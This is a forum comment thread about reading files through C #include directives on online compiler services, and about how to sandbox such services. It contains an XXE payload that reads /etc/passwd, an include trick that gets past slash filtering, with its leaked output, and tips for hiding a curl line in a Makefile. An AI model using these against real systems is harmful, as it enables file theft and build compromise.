> Recently I saw a tweet where someone mentioned that you can include /dev/stdin in C code compiled with gcc. This is, to say the very least, surprising.
You can also call something to read from stdin in your Makefile, or read from stdin in your executable.
> But is it equally obvious that the compiler also needs to be sandboxed?
Yes. Why wouldn't it be sandboxed?!
> I even found one service that ... showed me the hash of the root password.
Wow. That's bad. Of course, that's not a compiler issue, but rather a system administration issue. /etc/shadow should not be world-readable.
> This effectively means this service is running compile tasks as root.
That's quite a leap from 'I can read /etc/shadow' to 'I am root'.
> Interestingly, including pseudo-files from /proc does not work. It seems gcc treats them like empty files.
More accurately, it seems the system treats them like empty files. gcc does a stat on the file, which returns 'regular file' and 'size=0'. gcc therefore calls read() with a length of 0 bytes.
> That's quite a leap from 'I can read /etc/shadow' to 'I am root'.
Of all the leaps in that post, that's the least leapy thing. `shadow` exists precisely so that only `root` can read its content, whereas before said content resided in `passwd` which _needs_ to be readable by all.
I see only two possibilities here. Either the people who set up that compile service are complete morons and run said compile as actual root in an actual VM; OR, more likely, shit runs in a container with an _apparent_ id of 0 but no actual privilege outside its temporary environment.
Running as actual root in a VM would be my preferred design. There are lots of times a user might need to apt-get some dependencies for their compile job. Let an attacker do whatever they like in the VM. Then delete the VM between users.
Docker containers aren't really a good security barrier, and a VM is much better (although VM escape vulnerabilities aren't unheard of).
> I did not see any relevant content on the websites you mention in your HN profile
At least I have a filled out profile, unlike you.
Besides that, and the cheap personal attacks, you seem to be completely missing the point, so let me spell it out for you: VMs, containers, chroot jails and all the other tools with which we try to isolate two pieces of software running on the same hardware have exploits: past, current and future ones. Any piece of software of even moderate complexity will have bugs, so any isolation method should be considered fallible and leaky, and your best defenses will take that into account when you architect your setup.
If you don't then sooner or later someone with more patience, a larger budget or more knowledge than you will get the better of you with all the consequences that may have.
The idea is that virtualization escape vulnerabilities are quite frequent. An attacker might not have one on hand at any given moment, and you might patch your system promptly when they become known.
But that only means a determined attacker with emulated root needs patience. Good security means stacking independent layers; betting the farm on the guarantees of your VM alone is very unsafe.
Running in a VM is good. Running in a VM as a non-priv user is better. Ideally you'd want multiple layers of defense in case of undiscovered gaps, human error and 0-days.
>That's quite a leap from 'I can read /etc/shadow' to 'I am root'.
Is it? There are alternatives of course but I would say that without further clues that seems the most likely explanation.
I agree with the rest of your points though. In general it seems fairly obvious that build systems should be sandboxed if they're building "foreign" code, after all if you can mess with the source code you can probably affect the build system as well, and from there you can basically do anything you want.
> More accurately, it seems the system treats them like empty files.
The reason is that the content is generated by a callback that the kernel calls, and the kernel does not want the content to be generated just in order to stat(2) the file, so it shows a zero length, and assumes that things like /bin/cat will just read(2) until EOF is returned, without trying to be too smart.
If that were my server I would of course put a joke in /etc/shadow. Did you try to brute-force the hashes? It would not be a great surprise to find some obviously funny content if you did.
That's a pretty long passphrase, so someone would have to have put it in the word list directly to ever guess something that long. Would be fun though.
It's an interesting tangent that the "confused deputy" security problem was first identified in a compiler, back in the days when people paid to have their code compiled. This led toward "capabilities" and a lot of operating system design that is now in vogue again.
(this #include problem can be thought of as a confused deputy vulnerability. The compiler shouldn't have the capability to read the password file, and if it did, it is a confused deputy to be wielding that cap on behalf of its user, instead of wielding the caps it gets from the user).
It's sad that the links to Norm Hardy's original write-up all seem broken.
Henry Levy's 1984 book "Capability-Based Computer Systems" -- a survey and description of early object-based and capability-based processors and operating systems -- is available here:
Compiling untrusted code is already a dangerous affair. Compilers are not audited for security vulnerabilities, and many versions of popular compilers have contained memory corruption bugs or similar issues that could be leveraged to gain code execution. Many services that compile untrusted code will run the resulting binaries too, which definitely requires a sandbox or disposable VM - at which point you may as well throw your whole compiler in the sandbox/VM too.
I find it more likely that the "root" user mentioned in this post is the root user of some disposable Docker container, which would be the right way to run a compiler-as-a-service.
> I find it more likely that the "root" user mentioned in this post is the root user of some disposable Docker container, which would be the right way to run a compiler-as-a-service.
My understanding is that Docker isn't something you use if you really want security.
You're being downvoted but you're right- Docker really isn't a good choice for running untrusted and potentially hostile code, since a container breakout zero-day pretty much immediately compromises the host OS. (Even with user namespace remapping a breakout still gives enough access to get up to shenanigans.)
At the minimum a disposable VM using something like KVM/QEMU/Firecracker would be a start. That way you have kernel isolation down to the hardware which is much less likely to be exploitable.
The attack surface of a hypervisor is tiny, in comparison.
There was 'interesting' research out of IBM a couple of years ago where they claimed they found that containers with good seccomp profiles etc were 'as secure as' a VM. Well, nobody goes around believing that.
I recall once asking Joanna Rutkowska this same question, I think just days after she had outlined some pretty glaring security issues in the Xen hypervisor. She pointed out that if we were finding (and fixing) security issues in the 2K (or 20K, or however big the trusted computing base of Xen is, I forget), then imagine the number of issues lying unfound in your modern kernel...?
> There was 'interesting' research out of IBM a couple of years ago where they claimed they found that containers with good seccomp profiles etc were 'as secure as' a VM. Well, nobody goes around believing that.
You're leaving out a key detail of that research. They never said that tuning seccomp profiles to secure existing containerized apps is practical or effective. In fact, quite the opposite. IIRC, what they actually did is to create a hypervisor-like narrow interface on top of containers by restricting the available system calls to closely resemble KVM's hypercall interface. This design allowed the authors to reduce the size of the trusted computing base while avoiding overheads associated with VMs, though it would also limit the ability to run unmodified Linux binaries. Overall, I found it to be an interesting alternative to containers or VMs.
Funny that you say Docker is not for security (it's there in the manual) but then suggest chroot of all things, which is just as well documented as not being meant for security!
The point is that neither tool has a security focus, any security characteristics they might have are incidental and not at all guaranteed, and so neither should be used for that purpose.
This is true, but containers are so much better than nothing and relatively simple to use, so if someone isn't going to put in the effort for a more secure solution I'd rather they use Docker than nothing.
Yes, Docker largely became popular because of its user friendliness. Running a containerized compile job can be quickly done in a single command (e.g. docker run --rm -v "$(pwd):/src" -t ownyourbits/mmake).
Why not? There's a good chance the user will be needing to install extra packages or libraries, or run custom makefile steps that require extra permissions the system designer couldn't anticipate.
I think running as root is exactly the right thing to do here. Then throw the whole VM or container away when handling a request for another user.
Running a compiler as root in general is not recommended. It's the principle of least privilege. Running without unnecessary privileges is a good idea for the same reason running in a sandbox is a good idea.
Custom makefile steps that require running the compiler as root? More likely they need to run `chown` or `chmod` or something else as root -- i.e., something that has a far smaller attack surface.
Sure some can, but if you're making a compiler-as-a-service, you want it to be compatible with as many as possible. I suspect being root maximizes compatibility. Hardcoded "/usr/bin" paths are just the start...
On a related note, the XML standard defines a way to include external files in the document. If you come across a service which replies with a part of your request (e.g. validation errors) and uses an XML parser with this feature turned on, which is true by default in many cases, this can be used to read arbitrary files. I wonder how many poorly maintained enterprise systems are vulnerable to that.
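The classic payload (XXE, i.e. XML External Entity injection) looks something like this; if the parser resolves external entities and the service echoes the parsed value back, the file contents come back with it:

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
```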
About a year and a half ago it was a very common vulnerability to find when doing web application assessments. Especially if uploading Excel spreadsheets was somehow involved.
It's less common now that most major parsers are turning this feature off by default though.
XXE is a feature that never should have happened. Whoever decided that not only should it be a thing, but that it should be enabled by default, needs to have their keyboard taken away.
> is it equally obvious that the compiler also needs to be sandboxed?
I would NEVER expect that one can run a C or C++ compiler on arbitrary input safely. There are so many potential attack vectors and, unless the authors have gone out of their way extensively to prevent them, it seems very likely they would suffer from buffer overflows, leaking memory to callers, and in the worst case arbitrary code execution.
I doubt any one of these websites is safe unless using very strict validation or disposable VMs/hardware in some way.
This seems contrived. So you need to send someone "evil" code that they won't read, have them compile it as root, and then ship you the resulting binary.
I wouldn't read too much into it "working" with some kind of compile/show service, as they could have been using non-persistent containers.
Ultimately this seems like social engineering, i.e. "tricking privileged users into doing <bad thing> as root." You might as well just ask them to cat /etc/shadow and email you the "nonsense" it prints.
People compile unread code all the time. Having them send the binary back is a little unusual though. But nothing says the resulting binary can't open its own socket when it's first run. There are lots of exfiltration options.
Getting them to run make as root would be pretty easy. People are already conditioned to run “sudo make install”.
A good mitigation is to install software by user so root privileges aren’t needed at any step of the process.
Restricted user accounts don't keep us secure - if you run malicious software even as a regular desktop user, there's tons of ways for it to get root, or do damage/get valuable data without it. What keeps us safe, usually, is a web of trust that involves package managers and websites. A vulnerability like this is only a problem if there is a threat model that sidesteps the usual web-of-trust mechanisms we use. In your specific variant, someone gets a source tarball from a weird place and runs 'make' as root on its Makefile - at that point, #include shenanigans are entirely redundant.
Basically, this is a very strained local privilege escalation exploit for a workstation machine. I don't think those are very interesting because there are a bazillion of them; notably, you can simply drop an alias to sudo in .profile.
Put your curl line as one of the commands under the "install" target in the Makefile. That way you aren't dependent on the other guy running his C compiler as root (why?!). Just make sure the Makefile is some horribly mangled mess built by ./configure or something so nobody will be tempted to read it.
It will almost certainly take longer for someone to read your Makefile to notice that weird curl line than it would be for someone to try to compile your code as a regular user and have the compiler spit out an error because it can't read the include file "/etc/shadow".
Have make suppress error messages for the .o that includes it. You can have another file implement any missing symbols with a weak attribute so the linker won't complain if your evil object file fails to build.
If you go with C++ then you have an entire Turing complete language executed at compile time to do whatever nasty thing your heart desires.
I agree there are much easier alternatives... but it's an intellectually interesting attack vector.
I don't think it is that contrived. I've contributed to a project that had bots build every GitHub pull request and post build+test logs in the comments.
Not only is it contrived, it's also compiler dependent[1]. I'd wager most compilers will simply copy the contents of the included file like gcc does, but all kinds of other stuff can happen.
Step 1: publish a node package that does something people would like.
Step 2: do whatever you like in the install script ;) like checking whether they have passwordless sudo.
They're talking about reading compiler errors, so there won't be a binary to ship. If we could arrange for the code to compile correctly and then be executed, we wouldn't need the binary because the program itself could just upload all the password hashes.
It's something I use to measure certain things, like how many instructions does a C++ exception add etc.
It's run in a Docker container, and I think I strip out any slashes from includes. I'm pretty sure the container isn't executing stuff as root either. Still, probably not bulletproof.
    #include "\
    /etc/passwd"

    program221/code.cpp:1:11: warning: backslash-newline at end of file
        1 | #include "\
          |
    In file included from program221/code.cpp:2:
    /etc/passwd:1:5: error: found ':' in nested-name-specifier, expected '::'
        1 | root:x:0:0:root:/root:/bin/bash
          |     ^
          |     ::
    /etc/passwd:1:1: error: 'root' does not name a type
        1 | root:x:0:0:root:/root:/bin/bash
          | ^~~~
Is it possible to restrict the compiler's access to only files in "/usr/include" instead? Seems like it'd be hard to cover every case with just pattern matching.
It would be awesome if you could place restrictions on the compiler, but I don't know of any such features atm. Still, the compilation happens in the container (which is just a default Ubuntu image with a cross compiler in it). I don't know how much information there is to disclose. Not taking it lightly though, I guess I will have to find a way to really handle the preprocessor stuff, but I still want people to be able to include system headers.
> Is it possible to restrict the compiler's access to only files in "/usr/include" instead? Seems like it'd be hard to cover every case with just pattern matching.
Untrusted code execution in a Docker container is not exactly safe. Even if the runtime and container are optimally configured for security purposes (uncommon), container runtimes are not designed or particularly thoroughly evaluated for use as a security solution.
Virtually all Linux distributions sandbox their package build system using something like fakeroot.
Beyond the security reason the OP mentions, they don't want the host environment to break their build tasks, and they don't want to clobber host directories when they make mistakes with installation paths.
fakeroot is not a sandbox, it's just a way to have tasks which normally expect to run as root (like setting file permissions during "make install", or creating a .tar.gz with the correct permissions) work without root. IIRC, it works through LD_PRELOAD, and it's very easy to bypass (just unset that environment variable).
This reminds me that in say, a *BSD ports tree, you end up pulling tarballs from the internet, extracting them and running make. (Granted there can be a hash on them so that's some verification)
But an exploit using that would likely sooner just write something malicious in the Makefile if it wants to compromise the build machine. Targeting the compiler for such a goal seems like it would be harder.
There’s the mandatory hash, but generally speaking: that’s how you build software on Unix/Linux; there’s no way around it. You can do what Poudriere automatically does on FreeBSD, which is doing the whole thing in a dedicated jail.
If the output from the compiler is a binary object (.o) instead of the assembly (.s), I'd use gcc's inline assembly extension to call the GNU assembly ".incbin" directive (plus the necessary directives to put it in the correct section with an exported symbol).
The godbolt compiler explorer, which is awesome btw, had to tackle all sorts of problems like this. I think there is a talk on YouTube that goes into some detail.
Sandboxing your build is good practice anyway, for this and many other reasons :) For bonus points, build each major component in its own sandbox and integrate them later. That allows you to tightly control your dependencies (which makes your project tidier and makes incremental builds faster), and it paves the way to reproducible builds.
If you can include /etc/shadow you can also just cat it. curl|sh software installations are far more of a threat than a potentially malicious C preprocessor statement.
> There are plenty of webpages that offer online services where you can type in C code and run it. It is obvious that such systems are insecure if the code running is not sandboxed in some way. But is it equally obvious that the compiler also needs to be sandboxed?
Neither of the individual facts is surprising. It is the juxtaposition that is. In 20 years of writing C/C++ code, I had never thought of #including files such as /dev/stdin.
Of course, I know how the #include mechanism works, and what the special device files do, so I can anticipate the results of #include </dev/stdin>, but it is unusual enough that I had to write a small test program to see for myself.
It used to be the case that programmers were simply another step up from "power user", and as such would've already become familiar with such aspects of the system. Now, people are "learning to code" with barely any basic computer literacy, and the situation is even worse thanks to opaque locked-down platforms like mobile, so that a lot of them unfortunately have only a vague notion of what a file is, much less the whole "devices are also files" paradigm that underlies Unix (and to a certain extent, Windows --- but how many Windows programmers know about CON?)
I've surprised some coworkers -- ones who are definitely not inexperienced or just learning -- by e.g. using /dev/stdout as a logfile, or even /dev/pts/x to have multiple logs directly written to separate terminal windows. They all "knew" that devices are files, but never thought about actually trying to use them as such.
> Why is this surprising? Do programmers not read books anymore? [...]
No need to be condescending. Three reasons:
1) A sophisticated compiler might read the length of a file before loading it, so that it can allocate a buffer of the right size. Doesn't work with /dev/stdin.
2) Alternatively, it might read the file via mmap(). Doesn't work with /dev/stdin.
3) Furthermore, it might check whether the file is a regular file. If not, it is almost certainly not what the programmer had in mind.
> 1) A sophisticated compiler might read the length of a file before loading it, so that it can allocate a buffer of the right size. Doesn't work with /dev/stdin.
gcc does this. It appears to be why /proc files don't work. gcc sees that stat calls it a 'regular file' and 0 bytes long, and actually performs a read() syscall with a length of 0.
> 3) Furthermore, it might check whether the file is a regular file. If not, it is almost certainly not what the programmer had in mind.
gcc probably does this. (It would explain why /dev/stdin works)
Nix won't help you secure your system from untrusted code written by internet script kiddies. It's a build tool and simply isn't designed for such things.
That only works if you can turn your entire web application into a Nix build process, which is unrealistic at best. Nix is wonderful as a build tool, but it's quite a stretch to assume it's adequate for securing running applications. Plain containers, or even better, VMs are more suited for that purpose.
Counterpoint: why should '/' be invalid? I'm not saying it's good practice or that the compiler shouldn't warn you, but "/home/me/path_to_thing/file" is a perfectly valid path.
An absolute path is a valid path on the filesystem. But with <> the compiler should be searching according to its implementation-defined search paths. Accepting absolute paths as-is, neither prepending a search path nor rejecting them, is an implementation choice I personally think is wrong for a C compiler. But it's probably allowed to, I guess, since you can also do "..".